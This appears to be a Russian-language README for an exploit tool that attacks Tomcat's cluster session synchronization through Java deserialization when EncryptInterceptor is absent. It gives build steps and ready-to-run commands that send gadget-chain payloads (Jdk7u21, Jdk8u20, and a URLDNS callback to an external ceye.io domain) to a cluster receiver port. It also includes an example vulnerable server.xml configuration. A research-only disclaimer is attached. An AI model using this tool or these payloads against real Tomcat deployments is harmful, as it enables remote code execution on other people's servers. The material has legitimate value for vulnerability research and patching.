
Когда Tomcat использует встроенную функцию синхронизации сессий, небезопасная конфигурация (без использования EncryptInterceptor) приводит к возникновению уязвимости десериализации. С помощью специально сформированных пакетов данных можно атаковать серверы, использующие встроенную функцию синхронизации сессий Tomcat. PS: это не CVE-2020-9484; 9484 — это уязвимость персистентности сессий, а это уязвимость кластерной синхронизации сессий!
Инструмент предназначен только для исследований в области безопасности и внутренних проверок, запрещается использовать его для незаконных атак, ответственность за последствия несёт пользователь.
Это уязвимость десериализации, возникающая из-за небезопасной конфигурации (без использования EncryptInterceptor), когда в Tomcat используется встроенная функция синхронизации сессий. С помощью специально сформированных пакетов можно атаковать серверы, использующие встроенную синхронизацию сессий Tomcat.
Сначала скомпилируйте jar-пакет:
mvn clean compile assembly:assembly
Сгенерированный jar-пакет находится в каталоге target.
Использование, пример:
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"
(conf/server.xml):
<Server>
...
<Service>
...
<Engine>
...
<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
channelSendOptions="6">
<Manager className="org.apache.catalina.ha.session.BackupManager"
expireSessionsOnShutdown="false"
notifyListenersOnReplication="true"
mapSendOptions="6"/>
<Channel className="org.apache.catalina.tribes.group.GroupChannel">
<Membership className="org.apache.catalina.tribes.membership.McastService"
address="228.0.0.4"
port="45564"
frequency="500"
dropTime="3000"/>
<Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
address="123.123.123.123"
port="5000"
selectorTimeout="100"
maxThreads="6"/>
<Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
<Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
</Sender>
</Channel>
<Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
<Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
tempDir="/tmp/war-temp/"
deployDir="/tmp/war-deploy/"
watchDir="/tmp/war-listen/"
watchEnabled="false"/>
<ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
</Cluster>
</Engine>
</Service>
</Server>